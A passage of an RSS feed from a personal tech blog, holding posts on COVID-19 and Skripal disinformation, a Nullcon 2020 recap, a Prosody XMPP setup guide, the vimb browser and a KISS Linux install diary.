<div class="codehilite"><pre><span></span><code><span class="nv">msg</span><span class="o">=</span><span class="s2">&quot;</span><span class="k">$(</span>./mael-parser <span class="s2">&quot;</span><span class="nv">$maildir_message_path</span><span class="s2">&quot;</span><span class="k">)</span><span class="s2">&quot;</span>
</code></pre></div>

<p>These kind of one-way (bash -> Python) calls are what drive the entire
process. I&#8217;m not sure what to think of it. Perhaps I might just give up
and write the entire thing in Python.
Or&#8230;I might just scrap this entirely and just shut up and use aerc.
I don&#8217;t know yet. The code does seem to be growing in size rapidly. It&#8217;s
about ~350 LOC in two days of writing (Python + bash). New problems
arise every now and then and it&#8217;s pretty hard to keep track of all of
this. It&#8217;ll be cool when it&#8217;s all done though (I think).</p>

<p>If only things just worked.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-oss">
<p>I have yet to open source it; this post will be updated with
a link to it when I do.&#160;<a href="#fnref-oss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/mael</link><pubDate>Sun, 29 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mael</guid></item><item><title>COVID-19 disinformation</title><description><![CDATA[<p>The virus spreads around the world, along with a bunch of disinformation
and potential malware / phishing campaigns. There are many actors,
pushing many narratives---some similar, some different. </p>

<p>Interestingly, the three big players in the information warfare
space---Russia, Iran and China seem to be running similar stories on
their state-backed media outlets. While they all tend to lean towards
the same, fairly anti-U.S. sentiments---that is, blaming the US for
weaponizing the crisis for political gain---Iran and Russia&#8217;s content
come off as more&#8230;conspiratorial.
In essence, they claim that the COVID-19 virus is a &#8220;bioweapon&#8221;
developed by the U.S.</p>

<p>Russian news agency 
<a href="https://twitter.com/RT_com/status/1233187558793924608">RT tweeted</a>:</p>

<blockquote>
  <p>Show of hands, who isn&#8217;t going to be surprised if it ever gets 
  revealed that #coronavirus is a bioweapon?</p>
</blockquote>

<p>RT also published 
<a href="https://www.rt.com/usa/481485-coronavirus-russia-state-department/">an article</a>
mocking the U.S. for concerns over Russian disinformation.
Another article by RT, 
<a href="https://www.rt.com/op-ed/481831-coronavirus-kill-bill-capitalism-communism/">an op-ed</a>
suggests the virus&#8217; impact on financial markets might bring about the
reinvention of communism and the end of the global capitalist system.
Russian state-sponsored media can also be seen amplifying Iranian
conspiracy theories---including the Islamic Revolutionary Guard Corps&#8217;
(IRGC) suggestion that COVID-19 
<a href="https://www.rt.com/news/482405-iran-coronavirus-us-biological-weapon/">is a U.S. bioweapon</a>.</p>

<p>Iranian media outlets appear to be running stories having similar
themese, as well. Here&#8217;s one 
<a href="https://www.presstv.com/Detail/2020/03/05/620217/US-coronavirus-James-Henry-Fetzer">by PressTV</a>, 
where they very boldly claim that the virus was developed by 
the U.S. and/or Isreal, to use as a bioweapon against Iran. Another
<a href="https://www.presstv.com/Detail/2020/03/05/620213/Coronavirus-was-produced-in-a-laboratory">nonsensical piece</a>
by PressTV suggests that 
&#8220;there are components of the virus that are related to HIV that could not have occurred naturally&#8221;.
The same article pushes another theory:</p>

<blockquote>
  <p>There has been some speculation that as the Trump Administration has
  been constantly raising the issue of growing Chinese global
  competitiveness as a direct threat to American national security and
  economic dominance, it might be possible that Washington has created
  and unleashed the virus in a bid to bring Beijing’s growing economy
  and military might down a few notches. It is, to be sure, hard to
  believe that even the Trump White House would do something so
  reckless, but there are precedents for that type of behavior</p>
</blockquote>

<p>These &#8220;theories&#8221;, as is evident, are getting wilder and wilder.</p>

<p>Unsurprisingly, China produces the most amount of content related to the
coronavirus, but they&#8217;re quite distinct in comparison to Russian and
Iranian media. The general theme behind Chinese narratives is
critisizing the West for&#8230;a lot of things.</p>

<p>Global Times claims that 
<a href="http://www.globaltimes.cn/content/1178494.shtml">democracy is an insufficient system</a>
to battle the coronavirus. They <a href="http://www.globaltimes.cn/content/1178494.shtml">blame the U.S.</a>
for unfair media coverage against China, and other <a href="http://www.globaltimes.cn/content/1180630.shtml">anti-China
narratives</a>.
There are a ton other articles that play the racism/discrimination
card---I wouldn&#8217;t blame them though. <a href="http://www.globaltimes.cn/content/1178465.shtml">Here&#8217;s one</a>.</p>

<p>In the case of India, most disinfo (actually, misinfo) is mostly just
pseudoscientific / alternative medicine / cures in the form of WhatsApp
forwards---"Eat foo! Eat bar!&#8221;.<sup class="footnote-ref" id="fnref-cowpiss"><a href="#fn-cowpiss">1</a></sup></p>

<p>I&#8217;ve also been noticing a <em>ton</em> of COVID-19 / coronavirus related domain
registrations happening. Expect phishing and malware campaigns using the
virus as a theme. In the past 24 hrs, ~450 <code>.com</code> domains alone were
registered.</p>

<p><img src="/static/img/corona_domains.png" alt="corona domains" /></p>

<p>Anywho, there are bigger problems at hand---like the fact that my uni
still hasn&#8217;t suspended classes!</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-cowpiss">
<p><a href="https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece">https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece</a>&#160;<a href="#fnref-cowpiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/covid19-disinfo</link><pubDate>Sun, 15 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/covid19-disinfo</guid></item><item><title>Nullcon 2020</title><description><![CDATA[<p><strong>Disclaimer</strong>: Political.</p>

<p>This year&#8217;s conference was at the Taj Hotel and Convention center, Dona
Paula, and its associated party at Cidade de Goa, also by Taj.
Great choice of venue, perhaps even better than last time. The food was
fine, the views were better.</p>

<p>With <em>those</em> things out of the way---let&#8217;s talk talks. I think
I preferred the panels to the talks---I enjoy a good, stimulating
discussion as opposed to only half-understanding a deeply technical
talk---but that&#8217;s just me. But there was this one talk that I really
enjoyed, perhaps due to its unintended comedic value; I&#8217;ll get into that
later.</p>

<p>The list of panels/talks I attended in order:</p>

<p><strong>Day 1</strong></p>

<ul>
<li>Keynote: The Metadata Trap by Micah Lee (Talk)</li>
<li>Securing the Human Factor (Panel)</li>
<li>Predicting Danger: Building the Ideal Threat Intelligence Model (Panel)</li>
<li>Lessons from the Cyber Trenches (Panel)</li>
<li>Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey Vishnyakov (Talk)</li>
<li>Taking the guess out of Glitching by Adam Laurie (Talk)</li>
<li>Keynote: Cybersecurity in India&#8212;Information Assymetry, Cross Border
Threats and National Sovereignty by Saumil Shah (Talk)</li>
</ul>

<p><strong>Day 2</strong></p>

<ul>
<li>Keynote: Crouching hacker, killer robot? Removing fear from
cyber-physical security by Stefano Zanero (Talk)</li>
<li>Supply Chain Security in Critical Infrastructure Systems (Panel)</li>
<li>Putting it all together: building an iOS jailbreak from scratch by
Umang Raghuvanshi (Talk)</li>
<li>Hack the Law: Protection for Ethical Cyber Security Research in India
(Panel)</li>
</ul>

<h2 id="re-closing-keynote">Re: Closing keynote</h2>

<p>I wish I could link the talk, but it hasn&#8217;t been uploaded just yet. I&#8217;ll
do it once it has. So, I&#8217;ve a few comments I&#8217;d like to make on some of
Saumil&#8217;s statements.</p>

<p>He proposed that the security industry trust the user more, and let them
make the decisions pertaining to personal security / privacy.
Except&#8230;that&#8217;s just not going to happen. If all users were capable
of making good, security-first choices---we as an industry don&#8217;t
need to exist. But that is unfortunately not the case.
Users are dumb. They value convenience and immediacy over
security. That&#8217;s the sad truth of the modern age.</p>

<p>Another thing he proposed was that the Indian Government build our own
&#8220;Military Grade&#8221; and &#8220;Consumer Grade&#8221; encryption.</p>

<p><em>&#8230;what?</em></p>

<p>A &#8220;security professional&#8221; suggesting that we roll our own crypto? What
even. Oh and, to top it off---when
<a href="https://twitter.com/tame_wildcard">Raman</a>, very rightly countered
saying that the biggest opponent to encryption <em>is</em> the Government, and
trusting them to build safe cryptosystems is probably not wise, he
responded by saying something to the effect of &#8220;Eh, who cares? If they
want to backdoor it, let them.&#8221; </p>

<p>Bruh moment.</p>

<p>He also had some interesting things to say about countering
disinformation. He said, and I quote &#8220;Join the STFU University&#8221;.</p>

<p>¿wat? Is that your best solution? </p>

<p>Judging by his profile, and certain other things he said in the talk, it
is safe to conclude that his ideals are fairly&#8230;nationalistic. I&#8217;m not
one to police political opinions, I couldn&#8217;t care less which way you
lean, but the statements made in the talk were straight up
incorrect.</p>

<h2 id="closing-thoughts">Closing thoughts</h2>

<p>This came out more rant-like than I&#8217;d intended. It is also the first
blog post where I dip my toes into politics. I&#8217;ve some thoughts on more
controversial topics for my next entry. That&#8217;ll be fun, especially when
my follower count starts dropping. LULW.</p>

<p>Saumil, if you ever end up reading this, note that this is not
a personal attack. I think you&#8217;re a cool guy.</p>

<p>Note to the Nullcon organizers: you guys did a fantastic job running the
conference despite Corona-chan&#8217;s best efforts. I&#8217;d like to suggest one
little thing though---please VET YOUR SPEAKERS more!</p>

<p><img src="/static/img/nullcon_beach.jpg" alt="group pic" /></p>
]]></description><link>https://icyphox.sh/blog/nullcon-2020</link><pubDate>Mon, 09 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/nullcon-2020</guid></item><item><title>Setting up Prosody for XMPP</title><description><![CDATA[<p>Remember the <a href="/blog/irc-for-dms/">IRC for DMs</a> article I wrote a while
back? Well&#8230;it&#8217;s safe to say that IRC didn&#8217;t hold up too well. It first
started with the bot. Buggy code, crashed a lot---we eventually gave up
and didn&#8217;t bring the bot back up. Then came the notifications, or lack
thereof. Revolution IRC has a bug where your custom notification rules
just get ignored after a while. In my case, this meant that
notifications for <code>#crimson</code> stopped entirely. Unless, of course, Nerdy
pinged me each time.</p>

<p>Again, none of these problems are inherent to IRC itself. IRC is
fantastic, but perhaps wasn&#8217;t the best fit for our usecase. I still do
use IRC though, just not for 1-on-1 conversations.</p>

<h2 id="why-xmpp">Why XMPP?</h2>

<p>For one, it&#8217;s better suited for 1-on-1 conversations. It also has
support for end-to-end encryption (via OMEMO), something IRC doesn&#8217;t
have.<sup class="footnote-ref" id="fnref-otr"><a href="#fn-otr">1</a></sup> Also, it isn&#8217;t centralized (think: email).</p>

<h2 id="soprosody">So&#8230;Prosody</h2>

<p><a href="https://prosody.im">Prosody</a> is an XMPP server. Why did I choose this
over ejabberd, OpenFire, etc.? No reason, really. Their website looked
cool, I guess.</p>

<h3 id="installing">Installing</h3>

<p>Setting it up was pretty painless (I&#8217;ve <a href="/blog/mailserver">experienced
worse</a>). If you&#8217;re on a Debian-derived system, add:</p>

<pre><code># modify according to your distro
deb https://packages.prosody.im/debian buster main 
</code></pre>

<p>to your <code>/etc/apt/sources.list</code>, and:</p>

<pre><code># apt update
# apt install prosody
</code></pre>

<h3 id="configuring">Configuring</h3>

<p>Once installed, you will find the config file at
<code>/etc/prosody/prosody.cfg.lua</code>. Add your XMPP user (we will make this
later), to the <code>admins = {}</code> line.</p>

<pre><code>admins = {"user@chat.example.com"}
</code></pre>

<p>Head to the <code>modules_enabled</code> section, and add this to it:</p>

<pre><code>modules_enabled = {
    "posix";
    "omemo_all_access";
...
    -- uncomment these
    "groups";
    "mam";
    -- and any others you think you may need
}
</code></pre>

<p>We will install the <code>omemo_all_access</code> module later.</p>

<p>Set <code>c2s_require_encryption</code>, <code>s2s_require_encryption</code>, and
<code>s2s_secure_auth</code> to <code>true</code>.
Set the <code>pidfile</code> to <code>/tmp/prosody.pid</code> (or just leave it as default?).</p>

<p>By default, Prosody stores passwords in plain-text, so fix that by
setting <code>authentication</code> to <code>"internal_hashed"</code></p>

<p>Head to the <code>VirtualHost</code> section, and add your vhost. Right above it,
set the path to the HTTPS certificate and key:</p>

<pre><code>certificates = "certs"    -- relative to your config file location
https_certificate = "certs/chat.example.com.crt"
https_key = "certs/chat.example.com.key"
...

VirtualHost "chat.example.com"
</code></pre>

<p>I generated these certs using Let&#8217;s Encrypt&#8217;s <code>certbot</code>, you can use
whatever. Here&#8217;s what I did:</p>

<pre><code># certbot --nginx -d chat.example.com
</code></pre>

<p>This generates certs at <code>/etc/letsencrypt/live/chat.example.com/</code>. You can
trivially import these certs into Prosody&#8217;s <code>/etc/prosody/certs/</code> directory using:</p>

<pre><code># prosodyctl cert import /etc/letsencrypt/live/chat.example.com
</code></pre>

<h3 id="plugins">Plugins</h3>

<p>All the modules for Prosody can be <code>hg clone</code>&#8217;d from
<a href="https://hg.prosody.im/prosody-modules.">https://hg.prosody.im/prosody-modules.</a> You will, obviously, need
Mercurial installed for this.</p>

<p>Clone it somewhere, and: </p>

<pre><code># cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules
</code></pre>

<p>Do the same thing for whatever other module you choose to install. Don&#8217;t
forget to add it to the <code>modules_enabled</code> section in the config.</p>

<h3 id="adding-users">Adding users</h3>

<p><code>prosodyctl</code> makes this a fairly simple task:</p>

<pre><code>$ prosodyctl adduser user@chat.example.com
</code></pre>

<p>You will be prompted for a password. You can optionally, enable
user registrations from XMPP/Jabber clients (security risk!), by setting
<code>allow_registration = true</code>.</p>

<p>I may have missed something important, so here&#8217;s <a href="https://x.icyphox.sh/prosody.cfg.lua">my
config</a> for reference.</p>

<h2 id="closing-notes">Closing notes</h2>

<p>That&#8217;s pretty much all you need for 1-on-1 E2EE chats. I don&#8217;t know much
about group chats just yet---trying to create a group in Conversations
gives a &#8220;No group chat server found&#8221;. I will figure it out later.</p>

<p>Another thing that doesn&#8217;t work in Conversations is adding an account
using an <code>SRV</code> record.<sup class="footnote-ref" id="fnref-srv"><a href="#fn-srv">2</a></sup> Which kinda sucks, because having a <code>chat.</code>
subdomain isn&#8217;t very clean, but whatever.</p>

<p>Oh, also---you can message me at
<a href="xmpp:icy@chat.icyphox.sh">icy@chat.icyphox.sh</a>.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-otr">
<p>I&#8217;m told IRC supports OTR, but I haven&#8217;t ever tried.&#160;<a href="#fnref-otr" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-srv">
<p><a href="https://prosody.im/doc/dns">https://prosody.im/doc/dns</a>&#160;<a href="#fnref-srv" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/prosody</link><pubDate>Tue, 18 Feb 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/prosody</guid></item><item><title>Status update</title><description><![CDATA[<p>It&#8217;s only been a two weeks since I got back to campus, and we&#8217;ve
<em>already</em> got our first round of cycle tests starting this Tuesday.
Granted, I returned a week late, but&#8230;that&#8217;s nuts!</p>

<p>We&#8217;re two whole weeks into 2020; I should&#8217;ve been working on something
status update worthy, right? Not really, but we&#8217;ll see.</p>

<h2 id="no-more-cloudflare">No more Cloudflare!</h2>

<p>Yep. If you weren&#8217;t aware---pre-2020 this site was behind Cloudflare
SSL and their DNS. I have since migrated off it to
<a href="https://he.net">he.net</a>, thanks to highly upvoted Lobste.rs comment.
Because of this switch, I infact, learnt a ton about DNS.</p>

<p>Migrating to HE was very painless, but I did have to research a lot
about PTR records---Cloudflare kinda dumbs it down. In my case, I had to
rename my DigitalOcean VPS instance to the FQDN, which then
automagically created a PTR record at DO&#8217;s end.</p>

<h2 id="i-dropped-icyrc">I dropped icyrc</h2>

<p>The IRC client I was working on during the end of last
December--early-January? Yeah, I lost interest. Apparently writing C and
ncurses isn&#8217;t very fun or stimulating.</p>

<p>This also means I&#8217;m back on weechat. Until I find another client that
plays well with ZNC, that is.</p>

<h2 id="kiss-stuff">KISS stuff</h2>

<p>I now maintain two new packages in the KISS community repository---2bwm
and aerc! The KISS package system is stupid simple to work with. Creating
packages has never been easier.</p>

<h2 id="icyphoxshfriendsfriends"><a href="/friends">icyphox.sh/friends</a></h2>

<p>Did you notice that yet? I&#8217;ve been curating a list of people I know IRL
and online, and linking to their online presence. This is like a webring
of sorts, and promotes inter-site traffic---making the web more &#8220;web&#8221;
again.</p>

<p>If you know me, feel free to <a href="/about#contact">hit me up</a> and I&#8217;ll link
your site too! My apologies if I&#8217;ve forgotten your name.</p>

<h2 id="patreon">Patreon!</h2>

<p>Is this big news? I dunno, but yes---I now have a Patreon. I figured I&#8217;d
cash in on the newfound traffic my site&#8217;s been getting. There won&#8217;t be
any exclusive content or any tiers or whatever. Nothing will change.
Just a place for y&#8217;all to toss me some $$$ if you wish to do so. ;)</p>

<p>Oh, and it&#8217;s at <a href="https://patreon.com/icyphox">patreon.com/icyphox</a>.</p>

<h2 id="misc">Misc.</h2>

<p>The Stormlight Archive is likely the <em>best</em> epic I have ever read till
date. I&#8217;m still not done yet; about 500 odd pages to go as of this
writing. But wow, Brandon really does know how to build worlds and magic
systems. I cannot wait to read all about the
<a href="https://coppermind.net/wiki/Cosmere">cosmere</a>.</p>

<p>I have also been working out for the past month or so. I can see them
gainzzz. I plan to keep track of my progress, I just don&#8217;t know how to
quantify it. Perhaps I&#8217;ll log the number of reps × sets I do each time,
and with what weights. I can then look back to see if either the weights
have increased since, or the number of reps × sets have. If you know of
a better way to quantify progress, let me know! I&#8217;m pretty new to this.</p>
]]></description><link>https://icyphox.sh/blog/2020-01-18</link><pubDate>Sat, 18 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2020-01-18</guid></item><item><title>Vimb&amp;#58; my Firefox replacement</title><description><![CDATA[<p>After having recently installed <a href="https://getkiss.org">KISS</a>, and
building Firefox from source, I was exposed to the true monstrosity that
Firefox---and web browsers in general---is. It took all of 9 hours to
build the dependencies and then Firefox itself.</p>

<p>Sure, KISS now ships Firefox binaries in the
<a href="https://github.com/kisslinux/repo/tree/master/extra/firefox-bin">firefox-bin</a>
package; I decided to get rid of that slow mess anyway.</p>

<h2 id="enter-vimb">Enter vimb</h2>

<p><a href="https://fanglingsu.github.io/vimb/">vimb</a> is a browser based on
<a href="https://webkitgtk.org/">webkit2gtk</a>, with a Vim-like interface. 
<code>webkit2gtk</code> builds in less than a minute---it blows Firefox out of
the water, on that front.</p>

<p>There isn&#8217;t much of a UI to it---if you&#8217;ve used Vimperator/Pentadactyl
(Firefox plugins), vimb should look familiar to you.
It can be configured via a <code>config.h</code> or a text based config file at
<code>~/.config/vimb/config</code>.
Each &#8220;tab&#8221; opens a new instance of vimb, in a new window but this can
get messy really fast if you have a lot of tabs open.</p>

<h2 id="enter-tabbed">Enter tabbed</h2>

<p><a href="https://tools.suckless.org/tabbed/">tabbed</a> is a tool to <em>embed</em> X apps
which support xembed into a tabbed UI. This can be used in conjunction
with vimb, like so:</p>

<pre><code>tabbed vimb -e
</code></pre>

<p>Where the <code>-e</code> flag is populated with the <code>XID</code>, by tabbed. Configuring
Firefox-esque keybinds in tabbed&#8217;s <code>config.h</code> is relatively easy. Once
that&#8217;s done---voilà! A fairly sane, Vim-like browsing experience that&#8217;s
faster and has a smaller footprint than Firefox.</p>

<h2 id="ad-blocking">Ad blocking</h2>

<p>Ad blocking support isn&#8217;t built-in and there is no plugin system
available. There are two options for ad blocking:</p>

<ol>
<li><a href="https://github.com/jun7/wyebadblock">wyebadblock</a></li>
<li><code>/etc/hosts</code></li>
</ol>

<h2 id="caveats">Caveats</h2>

<p><em>Some</em> websites tend to not work because they detect vimb as an older
version of Safari (same web engine). This is a minor inconvenience, and
not a dealbreaker for me. I also cannot login to Google&#8217;s services for
some reason, which is mildly annoying, but it&#8217;s good in a way---I am now
further incentivised to dispose of my Google account.</p>

<p>And here&#8217;s the screenshot y&#8217;all were waiting for:</p>

<p><img src="/static/img/vimb.png" alt="vimb" /></p>
]]></description><link>https://icyphox.sh/blog/mnml-browsing</link><pubDate>Thu, 16 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mnml-browsing</guid></item><item><title>Five days in a TTY</title><description><![CDATA[<p>This new semester has been pretty easy on me, so far. I hardly every
have any classes (again, so far), and I&#8217;ve a ton of free time on my
hands. This calls for---yep---a distro hop! </p>

<h2 id="why-kiss">Why KISS?</h2>

<p><a href="https://getkiss.org">KISS</a> has been making rounds on the interwebz lately.<sup class="footnote-ref" id="fnref-hn"><a href="#fn-hn">1</a></sup>
The Hacker News post spurred <em>quite</em> the discussion. But then again,
that is to be expected from Valleybros who use macOS all day. :^)</p>

<p>From the website,</p>

<blockquote>
  <p>An independent Linux® distribution with a focus on simplicity and the
  concept of “less is more”. The distribution targets <em>only</em> the x86-64
  architecture and the English language.</p>
</blockquote>

<p>Like many people did in the HN thread, &#8220;simplicity&#8221; here is not to be
confused with &#8220;ease&#8221;. It is instead, simplicity in terms of lesser and
cleaner code---no
<a href="https://www.urbandictionary.com/define.php?term=poetterware">Poetterware</a>.</p>

<p>This, I can get behind. A clean system with less code is like a clean
table. It&#8217;s nice to work on. It also implies security to a certain
extent since there&#8217;s a smaller attack surface. </p>

<p>The <a href="https://github.com/kisslinux/kiss"><code>kiss</code></a> package manager is written
is pure POSIX sh, and does <em>just enough</em>. Packages are compiled from
source and <code>kiss</code> automatically performs dependency resolution. Creating
packages is ridiculously easy too.</p>

<p>Speaking of packages, all packages---both official &amp; community
repos---are run through <code>shellcheck</code> before getting merged. This is
awesome; I don&#8217;t think this is done in any other distro.</p>

<p>In essence, KISS sucks less.</p>

<h2 id="installing-kiss">Installing KISS</h2>

<p>The <a href="https://getkiss.org/pages/install">install guide</a> is very easy to
follow. Clear instructions that make it hard to screw up; that didn&#8217;t
stop me from doing so, however.</p>

<h3 id="day-1">Day 1</h3>

<p>Although technically not in a TTY, it was still not <em>in</em> the KISS
system---I&#8217;ll count it. I&#8217;d compiled the kernel in the chroot and
decided to use <code>efibootmgr</code> instead of GRUB. <code>efibootmgr</code> is a neat tool
to modify the Intel Extensible Firmware Interface (EFI). Essentially,
you boot the <code>.efi</code> directly as opposed to choosing which boot entry
you want to boot, through GRUB. Useful if you have just one OS on the
system. Removes one layer of abstraction.</p>

<p>Adding a new EFI entry is pretty easy. For me, the command was:</p>

<pre><code>efibootmgr --create 
           --disk /dev/nvme0n1 \
           --part 1 \
           --label KISS Linux \
           --loader /vmlinuz
           --unicode 'root=/dev/nvme0n1p3 rw'  # kernel parameters
</code></pre>

<p>Mind you, this didn&#8217;t work the first time, or the second, or the
third &#8230; a bunch of trial and error (and asking on <code>#kisslinux</code>)
later, it worked.</p>

<p>Well, it booted, but not into KISS. Took a while to figure out that the
culprit was <code>CONFIG_BLK_DEV_NVME</code> not having been set in the kernel
config. Rebuild &amp; reboot later, I was in.</p>

<h3 id="day-2">Day 2</h3>

<p>Networking! How fun. An <code>ip a</code> and I see that both USB tethering
(ethernet) and wireless don&#8217;t work. Great. Dug around a bit---missing
wireless drivers was the problem. Found my driver, a binary <code>.ucode</code> from
Intel (eugh!). The whole day was spent in figuring out why the kernel
would never load the firmware. I tried different variations---loading
it as a module (<code>=m</code>), baking it in (<code>=y</code>) but no luck.</p>

<h3 id="day-3">Day 3</h3>

<p>I then tried Alpine&#8217;s kernel config but that was so huge and had a <em>ton</em>
of modules and took far too long to build each time, much to my
annoyance. Diffing their config and mine was about ~3000 lines! Too much
to sift through. On a whim, I decided to scrap my entire KISS install
and start afresh. </p>

<p>For some odd reason, after doing the <em>exact</em> same things I&#8217;d done
earlier, my wireless worked this time. Ethernet didn&#8217;t, and still
doesn&#8217;t, but that&#8217;s ok.</p>

<p>Building <code>xorg-server</code> was next, which took about an hour, mostly thanks
to spotty internet. The build went through fine, though what wasn&#8217;t was
no input after starting X. Adding my user to the <code>input</code> group wasn&#8217;t
enough. The culprit this time was a missing <code>xf86-xorg-input</code> package.
Installing that gave me my mouse back, but not the keyboard!</p>

<p>It was definitely not the kernel this time, because I had a working
keyboard in the TTY. </p>

<h3 id="day-4-day-5">Day 4 &amp; Day 5</h3>

<p>This was probably the most annoying of all, since the fix was <em>trivial</em>.
By this point I had exhausted all ideas, so I decided to build my
essential packages and setup my system. Building Firefox took nearly
9 hours, the other stuff were much faster.</p>

<p>I was still chatting on IRC during this, trying to zero down on what the
problem could be. And then:</p>

<pre><code>&lt;dylanaraps&gt; For starters I think st fails due to no fonts.
</code></pre>

<p>Holy shit! Fonts. I hadn&#8217;t installed <em>any</em> fonts. Which is why none of
the applications I tried launching via <code>sowm</code> ever launched, and hence,
I was lead to believe my keyboard was dead.</p>

<h2 id="worth-it">Worth it?</h2>

<p>Absolutely. I <em>cannot</em> stress on how much of a learning experience this
was. Also a test of my patience and perseverance, but yeah ok. I also
think that this distro is my endgame (yeah, right), probably because
other distros will be nothing short of disappointing, in one way or
another.</p>

<p>Huge thanks to the folks at <code>#kisslinux</code> on Freenode for helping me
throughout. And I mean, they <em>really</em> did. We chatted for hours on end
trying to debug my issues.</p>

<p>I&#8217;ll now conclude with an obligatory screenshot.</p>

<p><img src="https://x.icyphox.sh/R6G.png" alt="scrot" /></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-hn">
<p><a href="https://news.ycombinator.com/item?id=21021396">https://news.ycombinator.com/item?id=21021396</a>&#160;<a href="#fnref-hn" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/five-days-tty</link><pubDate>Mon, 13 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/five-days-tty</guid></item><item><title>2019 in review</title><description><![CDATA[<p>Just landed in a rainy Chennai, back in campus for my 6th semester.
A little late to the &#8220;year in review blog post&#8221; party; travel took up
most of my time. Last year was pretty eventful (at least in my books),
and I think I did a bunch of cool stuff---let&#8217;s see!</p>

<h2 id="interning-at-securelayer7">Interning at SecureLayer7</h2>

<p>Last summer, I interned at <a href="https://securelayer7.net">SecureLayer7</a>,
a security consulting firm in Pune, India. My work was mostly in
hardware and embededded security research. I learnt a ton about ARM and
MIPS reversing and exploitation, UART and JTAG, firmware RE and
enterprise IoT security.</p>

<p>I also earned my first CVE! I&#8217;ve written about it in detail
<a href="/blog/fb50">here</a>.</p>

<h2 id="conferences">Conferences</h2>

<p>I attended two major conferences last year---Nullcon Goa and PyCon
India. Both super fun experiences and I met a ton of cool people!
<a href="https://twitter.com/icyphox/status/1101022604851212288">Nullcon Twitter thread</a>
and <a href="/blog/pycon-wrap-up">PyCon blog post</a>.</p>

<h2 id="talks">Talks</h2>

<p>I gave two talks last year:</p>

<ol>
<li><em>Intro to Reverse Engineering</em> at Cyware 2019</li>
<li><em>"Smart lock? Nah dude."</em> at PyCon India</li>
</ol>

<h2 id="things-i-made">Things I made</h2>

<p>Not in order, because I CBA:</p>

<ul>
<li><a href="https://github.com/icyphox/repl">repl</a>: More of a quick bash hack, 
I don&#8217;t really use it.</li>
<li><a href="https://github.com/icyphox/pw">pw</a>: A password manager. This,
I actually do use. I&#8217;ve even written a tiny 
<a href="https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh"><code>dmenu</code> wrapper</a>
for it. </li>
<li><a href="https://github.com/icyphox/twsh">twsh</a>: An incomplete twtxt client,
in bash. I have yet to get around to finishing it.</li>
<li><a href="https://github.com/icyphox/alpine">alpine ports</a>: My APKBUILDs for
Alpine.</li>
<li><a href="https://github.com/icyphox/detotated">detotated</a>: An IRC bot written
in Python. See <a href="/blog/irc-for-dms">IRC for DMs</a>.</li>
<li><a href="https://github.com/icyphox/icyrc">icyrc</a>: A no bullshit IRC client,
because WeeChat is bloat.</li>
</ul>

<p>I probably missed something, but whatever.</p>

<h2 id="blog-posts">Blog posts</h2>

<pre><code>$ ls -1 pages/blog/*.md | wc -l
20
</code></pre>

<p>So excluding today&#8217;s post, and <code>_index.md</code>, that&#8217;s 18 posts! I had
initially planned to write one post a month, but hey, this is great. My
plan for 2020 is to write one post a <em>week</em>---unrealistic, I know, but
I will try nevertheless.</p>

<p>I wrote about a bunch of things, ranging from programming to
return-oriented-programming (heh), sysadmin and security stuff, and
a hint of culture and philosophy. Nice!</p>

<p>The <a href="/blog/python-for-re-1">Python for Reverse Engineering</a> post got
a ton of attention on the interwebz, so that was cool.</p>

<h2 id="bye-2019">Bye 2019</h2>

<p>2019 was super productive! (in my terms). I learnt a lot of new things
last year, and I can only hope to learn as much in 2020. :)</p>

<p>I&#8217;ll see you next week.</p>
]]></description><link>https://icyphox.sh/blog/2019-in-review</link><pubDate>Thu, 02 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-in-review</guid></item><item><title>Disinfo war&amp;#58; RU vs GB</title><description><![CDATA[<p>This entire sequence of events begins with the attempted poisoning of
Sergei Skripal<sup class="footnote-ref" id="fnref-skripal"><a href="#fn-skripal">1</a></sup>, an ex-GRU officer who was a double-agent for
the UK&#8217;s intelligence services. This hit attempt happened on the 4th of
March, 2018. 8 days later, then-Prime Minister Theresa May formally
accused Russia for the attack.</p>

<p>The toxin used in the poisoning was a nerve agent called <em>Novichok</em>.
In addition to the British military-research facility at Porton Down,
a small number of labs around the world were tasked with confirming
Porton Down&#8217;s conclusions on the toxin that was used, by the OPCW
(Organisation for the Prohibition of Chemical Weapons).</p>

<p>With the background on the matter out of the way, here are the different
instances of well timed disinformation pushed out by Moscow.</p>

<h2 id="the-russian-offense">The Russian offense</h2>

<h3 id="april-14-2018">April 14, 2018</h3>

<ul>
<li>RT published an article claiming that Spiez had identified a different
toxin---BZ, and not Novichok.</li>
<li>This was an attempt to shift the blame from Russia (origin of Novichok),
to NATO countries, where it was apparently in use.</li>
<li>Most viral piece on the matter in all of 2018.</li>
</ul>

<p>Although technically correct, this isn&#8217;t the entire truth. As part of
protocol, the OPCW added a new substance to the sample as a test. If any
of the labs failed to identify this substance, their findings were
deemed untrustworthy. This toxin was a derivative of BZ.</p>

